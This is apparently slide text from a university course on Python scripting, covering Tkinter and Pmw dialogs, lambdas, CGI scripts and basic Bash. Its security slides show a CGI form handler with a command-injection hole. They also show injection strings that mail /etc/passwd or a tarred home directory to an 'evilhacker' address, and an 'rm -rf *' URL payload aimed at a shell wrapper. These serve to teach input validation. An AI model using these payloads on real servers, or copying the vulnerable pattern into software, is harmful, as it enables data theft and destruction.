        status_line.configure(text="'Cancel' was pressed")
    



    Tk Message box

    message = 'This is a demo of a Tk message dialog box'
    answer = tkMessageBox.Message(icon='info', type='ok',
             message=message, title='About').show()
    status_line.configure(text="'%s' was pressed" % answer)
    



    Pmw Message box

    message = """\
    This is a demo of the Pmw.MessageDialog box,
    which is useful for writing longer text messages
    to the user."""
    
    Pmw.MessageDialog(parent, title='Description',
        buttons=('Quit',), 
        message_text=message,
        message_justify='left',
        message_font='helvetica 12',
        icon_bitmap='info',
        # must be present if icon_bitmap is:
        iconpos='w')  
    



    User-defined dialogs

    userdef_d = Pmw.Dialog(self.parent,
          title='Programmer-Defined Dialog',
          buttons=('Apply', 'Cancel'),
          #defaultbutton='Apply',
          command=userdef_dialog_action)
    
    frame = userdef_d.interior()
    # stack widgets in frame as you want...
    ...
    
    def userdef_dialog_action(result):
        if result == 'Apply':
            # extract dialog variables ...
        else:
            # you canceled the dialog
        self.userdef_d.destroy()  # destroy dialog window
    



    Color-picker dialog

    import tkColorChooser
    color = tkColorChooser.Chooser(
        initialcolor='gray',
        title='Choose background color').show()
    # color[0]: (r,g,b) tuple, color[1]: hex number
    parent_widget.tk_setPalette(color[1]) # change bg color
    



    Pynche

    Advanced color-picker dialog or stand-alone program (pronounced 'pinch-ee')



    Pynche usage

    Make dialog for setting a color:
    import pynche.pyColorChooser
    color = pynche.pyColorChooser.askcolor(
            color='gray', # initial color
            master=parent_widget) # parent widget
    
    # color[0]: (r,g,b)  color[1]: hex number
    # same as returned from tkColorChooser
    
    Change the background color:
    try:
        parent_widget.tk_setPalette(color[1])
    except: 
        pass
    



    Open file dialog

    fname = tkFileDialog.Open(
            filetypes=[('anyfile','*')]).show()
    



    Save file dialog

    fname = tkFileDialog.SaveAs(
            filetypes=[('temporary files','*.tmp')],
            initialfile='myfile.tmp', 
            title='Save a file').show()
    



    Toplevel

    Launch a new, separate toplevel window:
    # read file, stored as a string filestr,
    # into a text widget in a _separate_ window:
    filewindow = Toplevel(parent) # new window
    
    filetext = Pmw.ScrolledText(filewindow,
         borderframe=5, # a bit space around the text
         vscrollmode='dynamic', hscrollmode='dynamic',
         labelpos='n', 
         label_text='Contents of file ' + fname,
         text_width=80, text_height=20,
         text_wrap='none')
    filetext.pack()
    
    filetext.insert('end', filestr)
    



    More advanced widgets

    Basic widgets are in Tk
    Pmw: megawidgets written in Python
    PmwContribD: extension of Pmw
    Tix: megawidgets in C that can be called from Python
    Looking for some advanced widget?
    check out Pmw, PmwContribD and Tix and their demo programs



    Canvas, Text

    Canvas: highly interactive GUI element with

    structured graphics (draw/move circles, lines, rectangles etc),
    write and edit text
    embed other widgets (buttons etc.)
    Text: flexible editing and displaying of text



    Notebook



    Pmw.Blt widget for plotting

    Very flexible, interactive widget for curve plotting



    Pmw.Blt widget for animation

    Check out src/py/gui/animate.py

    See also ch. 11.1 in the course book



    Interactive drawing of functions

    Check out src/tools/py4cs/DrawFunction.py

    See ch. 12.2.3 in the course book



    Tree Structures

    Tree structures are used for, e.g., directory navigation
    Tix and PmwContribD contain some useful widgets:
    PmwContribD.TreeExplorer, PmwContribD.TreeNavigator, Tix.DirList, Tix.DirTree, Tix.ScrolledHList



    Tix

    cd $SYSDIR/src/tcl/tix-8.1.3/demos   # (version no may change)
    tixwish8.1.8.3 tixwidgets.tcl        # run Tix demo
    



    GUI with 2D/3D visualization

    Can use Vtk (Visualization toolkit); Vtk has a Tk widget
    Vtk offers full 2D/3D visualization a la AVS, IRIS Explorer, OpenDX, but is fully programmable from C++, Python, Java or Tcl

  • MayaVi is a high-level interface to Vtk, written in Python (recommended!)
    Tk canvas that allows OpenGL instructions





    More advanced GUI programming




    Contents

    Customizing fonts and colors
    Event bindings (mouse bindings in particular)
    Text widgets



    More info

    Ch. 11.2 in the course book
    ``Introduction to Tkinter'' by Lundh (see doc.html)
    ``Python/Tkinter Programming'' textbook by Grayson
    ``Python Programming'' textbook by Lutz



    Customizing fonts and colors

    Customizing fonts and colors in a specific widget is easy (see Hello World GUI examples)
    Sometimes fonts and colors of all Tk applications need to be controlled
    Tk has an option database for this purpose
    Can use file or statements for specifying an option Tk database



    Setting widget options in a file

    File with syntax similar to X11 resources:
    ! set widget properties, first font and foreground of all widgets:
    *Font:                  Helvetica 19 roman
    *Foreground:            blue
    ! then specific properties in specific widgets:
    *Label*Font:            Times 10 bold italic
    *Listbox*Background:    yellow
    *Listbox*Foregrund:     red
    *Listbox*Font:          Helvetica 13 italic
    
    Load the file:
    root = Tk()
    root.option_readfile(filename)
    



    Setting widget options in a script

    general_font = ('Helvetica', 19, 'roman')
    label_font   = ('Times', 10, 'bold italic')
    listbox_font = ('Helvetica', 13, 'italic')
    root.option_add('*Font',                general_font)
    root.option_add('*Foreground',          'black')
    root.option_add('*Label*Font',          label_font)
    root.option_add('*Listbox*Font',        listbox_font)
    root.option_add('*Listbox*Background',  'yellow')
    root.option_add('*Listbox*Foreground',  'red')
    
    Play around with src/py/gui/options.py !



    Key bindings in a text widget

    Move mouse over text: change background color, update counter
    Must bind events to text widget operations



    Tags

    Mark parts of a text with tags:
    self.hwtext = Text(parent, wrap='word')
    # wrap='word' means break lines between words
    self.hwtext.pack(side='top', pady=20)
    
    self.hwtext.insert('end','Hello, World!\n', 'tag1')
    self.hwtext.insert('end','More text...\n',  'tag2')
    
    tag1 now refers to the 'Hello, World!' text
    Can detect if the mouse is over or clicked at a tagged text segment



    Problems with function calls with args

    We want to call
    self.hwtext.tag_configure('tag1', background='blue')
    
    when the mouse is over the text marked with tag1
    The statement
    self.hwtext.tag_bind('tag1','<Enter>',
         self.tag_configure('tag1', background='blue'))
    
    does not work, because function calls with arguments are not allowed as parameters to a function (only the name of the function, i.e., the function object, is allowed)
    Remedy: lambda functions (or our Command class)



    Lambda functions in Python

    Lambda functions are some kind of 'inline' function definitions
    For example,
    def somefunc(x, y, z):
        return x + y + z
    
    can be written as
    lambda x, y, z: x + y + z
    
    General rule:
    lambda arg1, arg2, ... : expression with arg1, arg2, ...
    
    is equivalent to
    def (arg1, arg2, ...):
        return expression with arg1, arg2, ...
    



    Example on lambda functions

    Prefix words in a list with a double hyphen
    ['m', 'func', 'y0']
    
    should be transformed to
    ['--m', '--func', '--y0']
    
    Basic programming solution:
    def prefix(word):
        return '--' + word
    options = []
    for i in range(len(variable_names)):
        options.append(prefix(variable_names[i]))
    
    Faster solution with map:
    options = map(prefix, variable_names)
    
    Even more compact with lambda and map:
    options = map(lambda word: '--' + word, variable_names)
    



    Lambda functions in the event binding

    Lambda functions: insert a function call with your arguments as part of a command= argument
    Bind events when the mouse is over a tag:
    # let tag1 be blue when the mouse is over the tag
    # use lambda functions to implement the feature
    
    self.hwtext.tag_bind('tag1','<Enter>',
         lambda event=None, x=self.hwtext:
         x.tag_configure('tag1', background='blue'))
    
    self.hwtext.tag_bind('tag1','<Leave>',
         lambda event=None, x=self.hwtext:
         x.tag_configure('tag1', background='white'))
    
    : event when the mouse enters a tag
    : event when the mouse leaves a tag



    Lambda function dissection

    The lambda function applies keyword arguments
    self.hwtext.tag_bind('tag1','<Enter>',
         lambda event=None, x=self.hwtext:
         x.tag_configure('tag1', background='blue'))
    
    Why?
    The function is called as some anonymous function
    def func(event=None):
    
    and we want the body to call self.hwtext, but self does not have the right class instance meaning in this function
    Remedy: keyword argument x holding the right reference to the function we want to call



    Alternative to lambda functions

    Make a more readable alternative to lambda:
    class Command:
        def __init__(self, func, *args, **kw):
            self.func = func
            self.args = args  # ordinary arguments
            self.kw = kw      # keyword arguments (dictionary)
    
        def __call__(self, *args, **kw):
            args = args + self.args
            kw.update(self.kw)  # override kw with orig self.kw
            self.func(*args, **kw)
    
    Example:
    def f(a, b, max=1.2, min=2.2):  # some function
        print 'a=%g, b=%g, max=%g, min=%g' % (a,b,max,min)
    
    c = Command(f, 2.3, 2.1, max=0, min=-1.2)
    c()  # call f(2.3, 2.1, 0, -1.2)
    



    Using the Command class

    from py4cs.misc import Command
    self.hwtext.tag_bind('tag1','<Enter>',
        Command(self.configure, 'tag1', 'blue'))
    
    def configure(self, event, tag, bg):
        self.hwtext.tag_configure(tag, background=bg)
    
    ###### compare this with the lambda version:
    
    self.hwtext.tag_bind('tag1','<Enter>',
        lambda event=None, x=self.hwtext:
        x.tag_configure('tag1',background='blue')
    



    Generating code at run time (1)

    Construct Python code in a string:
    def genfunc(self, tag, bg, optional_code=''):
        funcname = 'temp'
        code = "def %(funcname)s(self, event=None):\n"\
               "    self.hwtext.tag_configure("\
               "'%(tag)s', background='%(bg)s')\n"\
               "    %(optional_code)s\n" % vars()
    
    Execute this code (i.e. define the function!)
        exec code in vars()
    
    Return the defined function object:
        # funcname is a string, 
        # eval() turns it into func obj:
        return eval(funcname)
    



    Generating code at run time (2)

    Example on calling code:
    self.tag2_leave = self.genfunc('tag2', 'white')
    self.hwtext.tag_bind('tag2', '<Leave>', self.tag2_leave)
    
    self.tag2_enter = self.genfunc('tag2', 'red',
        # add a string containing optional Python code:
        r"i=...self.hwtext.insert(i,'You have hit me "\
        "%d times' % ...")
            
    self.hwtext.tag_bind('tag2', '<Enter>', self.tag2_enter)
    
    Flexible alternative to lambda functions!



    Fancy list (1)

    Usage:
    root = Tkinter.Tk()
    Pmw.initialise(root)
    root.title('GUI for Script II')
    
    list = [('exercise 1',  'easy stuff'),
            ('exercise 2',  'not so easy'),
            ('exercise 3',  'difficult')
                ]
    widget = Fancylist(root,list)
    root.mainloop()
    
    When the mouse is over a list item, the background color changes and the help text appears in a label below the list



    Fancy list (2)

    import Tkinter, Pmw
    
    class Fancylist:
      def __init__(self, parent, list, 
                   list_width=20, list_height=10):
        self.frame = Tkinter.Frame(parent, borderwidth=3)
        self.frame.pack()
            
        self.listbox = Pmw.ScrolledText(self.frame,
            vscrollmode='dynamic', hscrollmode='dynamic',
            labelpos='n', 
            label_text='list of chosen curves',
            text_width=list_width, text_height=list_height,
            text_wrap='none',  # do not break too long lines
        )
        self.listbox.pack(pady=10)
    
        self.helplabel = Tkinter.Label(self.frame, width=60)
        self.helplabel.pack(side='bottom',fill='x',expand=1)
    



    Fancy list (3)

    # Run through the list, define a tag,
    # bind a lambda function to the tag:
    
    counter = 0
    for (item, help) in list:
      tag = 'tag' + str(counter) # unique tag name
      self.listbox.insert('end', item + '\n', tag)
    
      self.listbox.tag_bind(tag, '<Enter>',
           lambda event, f=self.configure, t=tag, 
                  bg='blue', text=help:
           f(event, t, bg, text))
    
      self.listbox.tag_bind(tag, '<Leave>',
           lambda event, f=self.configure, t=tag, 
                  bg='white', text='':
           f(event, t, bg, text))
    
      counter = counter + 1
    # make the text buffer read-only:
    self.listbox.configure(text_state='disabled')
    
    def configure(self, event, tag, bg, text):
      self.listbox.tag_configure(tag, background=bg)
      self.helplabel.configure(text=text)
    



    Class implementation of simviz1.py

    Recall the simviz1.py script for running a simulation program and visualizing the results
    simviz1.py was a straight script, even without functions
    As an example, let's make a class implementation
    class SimViz:
        def __init__(self):
            self.default_values()
        
        def initialize(self):
            ...
    
        def process_command_line_args(self, cmlargs):
            ...
    
        def simulate(self):
            ...
    
        def visualize(self):
            ...
    



    Dictionary for the problem's parameters

    simviz1.py had problem-dependent variables like m, b, func, etc.
    In a complicated application, there can be a large amount of such parameters so let's automate
    Store all parameters in a dictionary:
    self.p['m'] = 1.0
    self.p['func'] = 'y'
    
    etc.
    The initialize function sets default values to all parameters in self.p



    Parsing command-line options

    def process_command_line_args(self, cmlargs):
        """Load data from the command line into self.p."""
        opt_spec = [ x+'=' for x in self.p.keys() ]
        try:
            options, args = getopt.getopt(cmlargs,'',opt_spec)
    
        except getopt.GetoptError:
            <handle illegal options>
    
        for opt, val in options:
            key = opt[2:] # drop prefix --
            if   isinstance(self.p[key], float):  val = float(val)
            elif isinstance(self.p[key], int):    val = int(val)
            self.p[key] = val  
    



    Simulate and visualize functions

    These are straight translations from code segments in simviz1.py
    Remember: m is replaced by self.p['m'], func by self.p['func'] and so on
    Variable interpolation,
    s = 'm=%(m)g ...' % vars()
    
    does not work with
    s = 'm=%(self.p['m'])g ...' % vars()
    
    so we must use a standard printf construction:
    s = 'm=%g ...' % (m, ...)
    
    or (better)
    s = 'm=%(m)g ...' % self.p
    



    Usage of the class

    A little main program is needed to steer the actions in class SimViz:
    adm = SimViz()
    adm.process_command_line_args(sys.argv[1:])
    adm.simulate()
    adm.visualize()
    
    See src/examples/simviz1c.py



    A class for holding a parameter (1)

    Previous example: self.p['m'] holds the value of a parameter
    There is more information associated with a parameter:

    the value
    the name of the parameter
    the type of the parameter (float, int, string, ...)
    input handling (command-line arg., widget type etc.)
    Idea: Use a class to hold parameter information



    A class for holding a parameter (1)

    Class declaration:
    class InputPrm:
        """class for holding data about a parameter"""
        def __init__(self, name, default, 
                     type=float): # string to type conversion func.
            self.name = name
            self.v = default  # parameter value
            self.str2type = type
    
    Make a dictionary entry:
    self.p['m'] = InputPrm('m', 1.0, float)
    
    Convert from string value to the right type:
    self.p['m'].v = self.p['m'].str2type(value)
    



    From command line to parameters

    Interpret command-line arguments and store the right values (and types!) in the parameter dictionary:
    def process_command_line_args(self, cmlargs):
        """load data from the command line into variables"""
        opt_spec = map(lambda x: x+"=", self.p.keys())
        try:
            options, args = getopt.getopt(cmlargs,"",opt_spec)
        except getopt.GetoptError:
    	...
        for option, value in options:
            key = option[2:]
            self.p[key].v = self.p[key].str2type(value)
    
    This handles any number of parameters and command-line arguments!



    Explanation of the lambda function

    Example on a very compact Python statement:
    opt_spec = map(lambda x: x+"=", self.p.keys())
    
    Purpose: create option specifications to getopt, --opt proceeded by a value is specified as 'opt='
    All the options have the same name as the keys in self.p
    Dissection:
    def add_equal(s): return s+'='  # add '=' to a string
    # apply add_equal to all items in a list and return the
    # new list:
    opt_spec = map(add_equal, self.p.keys())
    
    or written out:
    opt_spec = []
    for key in self.p.keys():
        opt_spec.append(add_equal(key))
    



    Printing issues

    A nice feature of Python is that
    print self.p
    
    usually gives a nice printout of the object, regardless of the object's type
    Let's try to print a dictionary of user-defined data types:
    {'A': <__main__.InputPrm instance at 0x8145214>, 
     'case': <__main__.InputPrm instance at 0x81455ac>, 
     'c': <__main__.InputPrm instance at 0x81450a4>
      ...
    
    Python do not know how to print our InputPrm objects
    We can tell Python how to do it!



    Tailored printing of a class' contents

    print a means 'convert a to a string and print it'
    The conversion to string of a class can be specified in the functions __str__ and __repr__:
    str(a)  means calling a.__str__()
    repr(a) means calling a.__repr__()
    
    __str__: compact string output
    __repr__: complete class content
    print self.p (or str(self.p) or repr(self.p)), where self.p is a dictionary of InputPrm objects, will try to call the __repr__ function in InputPrm for getting the 'value' of the InputPrm object



    From class InputPrm to a string

    Here is a possible implementation:
    class InputPrm:
        ...
        def __repr__(self):
            return str(self.v) + ' ' + str(self.str2type)
    
    Printing self.p yields
    {'A': 5.0 <type 'float'>, 
     'case': tmp1 <type 'str'>, 
     'c': 5.0 <type 'float'>
     ...
    



    A smarter string representation

    Good idea: write the string representation with the syntax needed to recreate the instance:
    def __repr__(self):
        # str(self.str2type) is <type 'type'>, extract 'type':
        m = re.search(r"<type '(.*)'>", str(self.str2type))
        if m:
            return "InputPrm('%s',%s,%s)" % \
                   (self.name, self.__str__(), m.group(1))
    
    def __str__(self):
        """compact output"""
        value = str(self.v)  # ok for strings and ints
        if self.str2type == float:
            value = "%g" % self.v  # compact float representation
        elif self.str2type == int:
            value = "%d" % self.v  # compact int representation
        elif self.str2type == float:
            value = "'%s'" % self.v  # string representation
        else:
            value = "'%s'" % str(self.v)
        return value
    



    Eval and str are now inverse operations

    Write self.p to file:
    f = open(somefile, 'w')
    f.write(str(self.p))
    
    File contents:
    {'A': InputPrm('A',5,float), ...
    
    Loading the contents back into a dictionary:
    f = open(somefile, 'r')
    q = eval(f.readline())
    





    Simple CGI programming in Python




    Interactive Web pages

    Topic: interactive Web pages
    (or: GUI on the Web)
    Methods:

    Java applets (downloaded)
    JavaScript code (downloaded)
    CGI script on the server
    Perl and Python are very popular for CGI programming



    Scientific Hello World on the Web

    Web version of the Scientific Hello World GUI
    HTML allows GUI elements (FORM)
    Here: text ('Hello, World!'), text entry (for r) and a button 'equals' for computing the sine of r
    HTML code:
    <HTML><BODY BGCOLOR="white">
    <FORM ACTION="hw1.py.cgi" METHOD="POST">
    Hello, World! The sine of 
    <INPUT TYPE="text" NAME="r" SIZE="10" VALUE="1.2">
    <INPUT TYPE="submit" VALUE="equals" NAME="equalsbutton">
    </FORM></BODY></HTML>
    



    GUI elements in HTML forms

    Widget type: INPUT TYPE
    Variable holding input: NAME
    Default value: VALUE
    Widgets: one-line text entry, multi-line text area, option list, scrollable list, button



    The very basics of a CGI script

    Pressing "equals" (i.e. submit button) calls a script hw1.py.cgi
    <FORM ACTION="hw1.py.cgi" METHOD="POST">
    
    Form variables are packed into a string and sent to the program
    Python has a cgi module that makes it very easy to extract variables from forms
    import cgi
    form = cgi.FieldStorage()
    r = form.getvalue("r")
    
    Grab r, compute sin(r), write an HTML page with (say)
    Hello, World! The sine of 2.4 equals 0.675463180551
    



    A CGI script in Python

    Tasks: get r, compute the sine, write the result on a new Web page
    #!/store/bin/python
    import cgi, math
    
    # required opening of all CGI scripts with output:
    print "Content-type: text/html\n"
    
    # extract the value of the variable "r":
    form = cgi.FieldStorage()
    r = form.getvalue("r")
    
    s = str(math.sin(float(r)))
    # print answer (very primitive HTML code):
    print "Hello, World! The sine of %s equals %s" % (r,s)
    



    Remarks

    A CGI script is run by a nobody or www user
    A header like
    #!/usr/bin/env python
    
    relies on finding the first python program in the PATH variable, and a nobody has a PATH variable out of our control
    Hence, we need to specify the interpreter explicitly:
    #!/store/bin/python
    
    Old Python versions do not support form.getvalue, use instead
    r = form["r"].value
    



    An improved CGI script

    Last example: HTML page + CGI script; the result of sin(r) was written on a new Web page
    Next example: just a CGI script
    The user stays within the same dynamic page, a la the Scientific Hello World GUI
    Tasks: extract r, compute sin(r), write HTML form
    The CGI script calls itself



    The complete improved CGI script

    #!/store/bin/python
    import cgi, math
    print "Content-type: text/html\n" # std opening
    
    # extract the value of the variable "r":
    form = cgi.FieldStorage()
    r = form.getvalue('r')
    if r is not None:
        s = str(math.sin(float(r)))
    else:
        s = ''; r = ''
    
    # print complete form with value:
    print """
    <HTML><BODY BGCOLOR="white">
    <FORM ACTION="hw2.py.cgi" METHOD="POST">
    Hello, World! The sine of 
    <INPUT TYPE="text" NAME="r" SIZE="10" VALUE="%s">
    <INPUT TYPE="submit" VALUE="equals" NAME="equalsbutton">
    %s </FORM></BODY></HTML>\n""" % (r,s)
    



    Debugging CGI scripts

    What happens if the CGI script contains an error?
    Browser just responds "Internal Server Error" -- a nightmare
    Start your Python CGI scripts with
    import cgitb; cgitb.enable()
    
    to turn on nice debugging facilities: Python errors now appear nicely formatted in the browser



    Debugging rule no. 1

    Always run the CGI script from the command line before trying it in a browser!
    unix> export QUERY_STRING="r=1.4"
    unix> ./hw2.py.cgi > tmp.html    # don't run python hw2.py.cgi!
    unix> cat tmp.html
    
    Load tmp.html into a browser and view the result
    Multiple form variables are set like this:
    QUERY_STRING="name=Some Body&phone=+47 22 85 50 50"
    



    Potential problems with CGI scripts

    Permissions you have as CGI script owner are usually different from the permissions of a nobody, e.g., file writing requires write permission for all users
    Environment variables (PATH, HOME etc.) are normally not available to a nobody
    Make sure the CGI script is in a directory where they are allowed to be executed (some systems require CGI scripts to be in special cgi-bin directories)
    Check that the header contains the right path to the interpreter on the Web server
    Good check: log in as another user (you become a nobody!) and try your script



    Shell wrapper (1)

    Sometimes you need to control environment variables in CGI scripts
    Example: running your Python with shared libraries
    #!/usr/home/me/some/path/to/my/bin/python
    ...
    
    python requires shared libraries in directories
    specified by the environment variable LD_LIBRARY_PATH
    
    Solution: the CGI script is a shell script that sets up your environment prior to calling your real CGI script



    Shell wrapper (2)

    General Bourne Again shell script wrapper:
    #!/bin/bash
    # usage: www.some.net/url/wrapper-sh.cgi?s=myCGIscript.py
    
    # just set a minimum of environment variables:
    export scripting=~inf3330/www_docs/scripting
    export SYSDIR=/ifi/ganglot/k00/inf3330/www_docs/packages
    export BIN=$SYSDIR/`uname`
    export LD_LIBRARY_PATH=$BIN/lib:/usr/bin/X11/lib
    export PATH=$scripting/src/tools:/usr/bin:/bin:/store/bin:$BIN/bin
    export PYTHONPATH=$SYSDIR/src/python/tools:$scripting/src/tools
    
    # or set up my complete environment (may cause problems):
    # source /home/me/.bashrc
    
    # extract CGI script name from QUERY_STRING:
    script=`perl -e '$s=$ARGV[0]; $s =~ s/.*=//; \
            print $s' $QUERY_STRING`
    ./$script
    



    Security issues

    Suppose you ask for the user's email in a Web form
    Suppose the form is processed by this code:
    if "mailaddress" in form:  
        mailaddress = form.getvalue("mailaddress")
        note = "Thank you!"
        # send a mail:
        mail = os.popen("/usr/lib/sendmail " + mailaddress, 'w')
        mail.write("...")
        mail.close()
    
    What happens if somebody gives this "address":
    x; mail evilhacker@some.where < /etc/passwd
    
    ??



    Even worse things can happen...

    Another "address":
    x; tar cf - /hom/hpl | mail evilhacker@some.where
    
    sends out all my files that anybody can read
    Perhaps my password or credit card number reside in any of these files?
    The evilhacker can also feed Mb/Gb of data into the system to load the server
    Rule: Do not copy form input blindly to system commands!
    Be careful with shell wrappers
    Recommendation: read the WWW Security FAQ



    Remedy

    Could test for bad characters like
             &;`'\"|*?~<>^()[]{}$\n\r
    
    Better: test for legal set of characters
    # expect text and numbers:
    if re.search(r'[^a-zA-Z0-9]', input):
       # stop processing
    
    Always be careful with launching shell commands;
    check possibilities for unsecure side effects



    Warning about the shell wrapper

    The shell wrapper script allows execution of a user-given command
    The command is intended to be the name of a secure CGI script, but the command can be misused
    Fortunately, the command is prefixed by ./
    ./$script
    
    so trying an rm -rf *,
    http://www.some.where/wrapper.sh.cgi?s="rm+-rf+%2A"
    
    does not work (./rm -rf *; ./rm is not found)

  • The encoding of rm -rf * is carried out by
    >>> urllib.urlencode({'s':'rm -rf *'})
    's=rm+-rf+%2A'
    



    Web interface to the oscillator code



    Handling many form parameters

    The simviz1.py script has many input parameters, resulting in many form fields
    We can write a small utility class for

    holding the input parameters (either default values or user-given values in the form)
    writing form elements



    Class FormParameters (1)

    class FormParameters:
        "Easy handling of a set of form parameters"
    
        def __init__(self, form):
            self.form = form     # a cgi.FieldStorage() object
            self.parameter = {}  # contains all parameters
    
        def set(self, name, default_value=None):
            "register a new parameter"
            self.parameter[name] = default_value
    
        def get(self, name):
            """Return the value of the form parameter name."""
            if name in self.form:
                self.parameter[name] = self.form.getvalue(name)
            if name in self.parameter:
                return self.parameter[name]
            else:
                return "No variable with name '%s'" % name
    



    Class FormParameters (2)

        def tablerow(self, name):
            "print a form entry in a table row"
            print """
            <TR>
            <TD>%s</TD>
            <TD><INPUT TYPE="text" NAME="%s" SIZE=10 VALUE="%s">
            </TR>
            """ % (name, name, self.get(name))
    
        def tablerows(self):
            "print all parameters in a table of form text entries"
            print "<TABLE>"
            for name in self.parameter.keys():
                self.tablerow(name)
            print "</TABLE>"
    



    Class FormParameters (3)

    Usage:
    form = cgi.FieldStorage()
    p = FormParameters(form)
    p.set('m', 1.0)  # register 'm' with default val. 1.0
    p.set('b', 0.7)
    ...
    p.set('case', "tmp1")
    
    # start writing HTML:
    print """
    <HTML><BODY BGCOLOR="white">
    <TITLE>Oscillator code interface</TITLE>
    <IMG SRC="%s" ALIGN="left">
    <FORM ACTION="simviz1.py.cgi" METHOD="POST">
    ...
    """ % ...
    # define all form fields:
    p.tablerows()
    



    Important issues

    We need a complete path to the simviz1.py script
    simviz1.py calls oscillator so its directory must be in the PATH variable
    simviz1.py creates a directory and writes files, hence nobody must be allowed to do this
    Failing to meet these requirements give typically Internal Server Error...



    Safety checks

    # check that the simviz1.py script is available and
    # that we have write permissions in the current dir
    simviz_script = os.path.join(os.pardir,os.pardir,"intro",
                                 "python","simviz1.py")
    if not os.path.isfile(simviz_script):
        print "Cannot find <PRE>%s</PRE>"\
              "so it is impossible to perform simulations" % \
              simviz_script
    # make sure that simviz1.py finds the oscillator code, i.e.,
    # define absolute path to the oscillator code and add to PATH:
    osc = '/ifi/ganglot/k00/inf3330/www_docs/scripting/SunOS/bin'
    os.environ['PATH'] = ':'.join([os.environ['PATH'],osc])
    if not os.path.isfile(osc+'/oscillator'):
        print "The oscillator program was not found"\
              "so it is impossible to perform simulations"
    if not os.access(os.curdir, os.W_OK):
        print "Current directory has not write permissions"\
              "so it is impossible to perform simulations"
    



    Run and visualize

    if form:                 # run simulator and create plot
        sys.argv[1:] = cmd.split()  # simulate command-line args...
        import simviz1       # run simviz1 as a script...
        os.chdir(os.pardir)  # compensate for simviz1.py's os.chdir
    
        case = p.get('case')
        os.chmod(case, 0777)  # make sure anyone can delete subdir
    
        # show PNG image:
        imgfile = os.path.join(case,case+'.png')
        if os.path.isfile(imgfile):
            # make an arbitrary new filename to prevent that browsers
            # may reload the image from a previous run:
            import random
            newimgfile = os.path.join(case,
                         'tmp_'+str(random.uniform(0,2000))+'.png')
            os.rename(imgfile, newimgfile)
            print """<IMG SRC="%s">""" % newimgfile
    print '</BODY></HTML>'
    



    The browser may show old plots

    'Smart' caching strategies may result in old plots being shown
    Remedy: make a random filename such that the name of the plot changes each time a simulation is run
    imgfile = os.path.join(case,case+".png")
    if os.path.isfile(imgfile):
        import random
        newimgfile = os.path.join(case,
                'tmp_'+str(random.uniform(0,2000))+'.png')
        os.rename(imgfile, newimgfile)
        print """<IMG SRC="%s">""" % newimgfile
    



    Using Web services from scripts

    We can automate the interaction with a dynamic Web page
    Consider hw2.py.cgi with one form field r
    Loading a URL agumented with the form parameter,
    http://www.some.where/cgi/hw2.py.cgi?r=0.1
    
    is the same as loading
    http://www.some.where/cgi/hw2.py.cgi
    
    and manually filling out the entry with '0.1'
    We can write a Hello World script that performs the sine computation on a Web server and extract the value back to the local host



    Encoding of URLs

    Form fields and values can be placed in a dictionary and encoded correctly for use in a URL:
    >>> import urllib
    >>> p = {'p1':'some  string','p2': 1.0/3, 'q1': 'Ødegård'}
    >>> params = urllib.urlencode(p)
    >>> params
    'p2=0.333333333333&q1=%D8deg%E5rd&p1=some++string'
    
    >>> URL = 'http://www.some.where/cgi/somescript.cgi'
    >>> f = urllib.urlopen(URL + '?' + params)  # GET method
    >>> f = urllib.urlopen(URL, params)         # POST method
    



    The front-end code

    import urllib, sys, re
    r = float(sys.argv[1])
    params = urllib.urlencode({'r': r})
    URLroot = 'http://www.ifi.uio.no/~inf3330/scripting/src/py/cgi/'
    f = urllib.urlopen(URLroot + 'hw2.py.cgi?' + params)
    # grab s (=sin(r)) from the output HTML text:
    for line in f.readlines():
        m = re.search(r'"equalsbutton">(.*)$', line)
        if m:
            s = float(m.group(1)); break
    print 'Hello, World! sin(%g)=%g' % (r,s)
    



    Distributed simulation and visualization

    We can run our simviz1.py type of script such that the computations and generation of plots are performed on a server
    Our interaction with the computations is a front-end script to simviz1.py.cgi
    User interface of our script: same as simviz1.py
    Translate comman-line args to a dictionary
    Encode the dictionary (form field names and values)
    Open an augmented URL (i.e. run computations)
    Retrieve plot files from the server
    Display plot on local host



    The code

    import math, urllib, sys, os
    
    # load command-line arguments into dictionary:
    p = {'case': 'tmp1', 'm': 1, 'b': 0.7, 'c': 5, 'func': 'y', 
         'A': 5, 'w': 2*math.pi, 'y0': 0.2, 'tstop': 30, 'dt': 0.05}
    for i in range(len(sys.argv[1:])):
        if sys.argv[i] in p:
            p[sys.argv[i]] = sys.argv[i+1]
    
    params = urllib.urlencode(p)
    URLroot = 'http://www.ifi.uio.no/~inf3330/scripting/src/py/cgi/'
    f = urllib.urlopen(URLroot + 'simviz1.py.cgi?' + params)
    
    # get PostScript file:
    file = p['case'] + '.ps'
    urllib.urlretrieve('%s%s/%s' % (URLroot,p['case'],file), file)
    
    # the PNG file has a random number; get the filename from
    # the output HTML file of the simviz1.py.cgi script:
    for line in f.readlines():
        m = re.search(r'IMG SRC="(.*)"', line)
        if m:
            file = m.group(1).strip(); break
    urllib.urlretrieve('%s%s/%s' % (URLroot,p['case'],file), file)
    os.system('display ' + file)
    





    Basic Bash programming




    Overview of Unix shells

    The original scripting languages were (extensions of) command interpreters in operating systems
    Primary example: Unix shells
    Bourne shell (sh) was the first major shell
    C and TC shell (csh and tcsh) had improved command interpreters, but were less popular than Bourne shell for programming
    Bourne Again shell (Bash/bash): GNU/FSF improvement of Bourne shell
    Other Bash-like shells: Korn shell (ksh), Z shell (zsh)
    Bash is the dominating Unix shell today



    Why learn Bash?

    Learning Bash means learning Unix
    Learning Bash means learning the roots of scripting
    (Bourne shell is a subset of Bash)
    Shell scripts, especially in Bourne shell and Bash, are frequently encountered on Unix systems
    Bash is widely available (open source) and the dominating command interpreter and scripting language on today's Unix systems
    Shell scripts are often used to glue more advanced scripts in Perl and Python



    More information

    Greg Wilson's excellent online course:
    http://www.swc.scipy.org
    man bash
    ``Introduction to and overview of Unix'' link in doc.html



    Scientific Hello World script

    Let's start with a script writing "Hello, World!"
    Scientific computing extension: compute the sine of a number as well
    The script (hw.sh) should be run like this:
    ./hw.sh 3.4
    
    or (less common):
    bash hw.py 3.4
    
    Output:
    Hello, World! sin(3.4)=-0.255541102027
    



    Purpose of this script

    Demonstrate

    how to read a command-line argument
    how to call a math (sine) function
    how to work with variables
    how to print text and numbers



    Remark

    We use plain Bourne shell (/bin/sh) when special features of Bash (/bin/bash) are not needed
    Most of our examples can in fact be run under Bourne shell (and of course also Bash)
    Note that Bourne shell (/bin/sh) is usually just a link to Bash (/bin/bash) on Linux systems
    (Bourne shell is proprietary code, whereas Bash is open source)



    The code

    File hw.sh:
    #!/bin/sh
    r=$1  # store first command-line argument in r
    s=`echo "s($r)" | bc -l`
    
    # print to the screen:
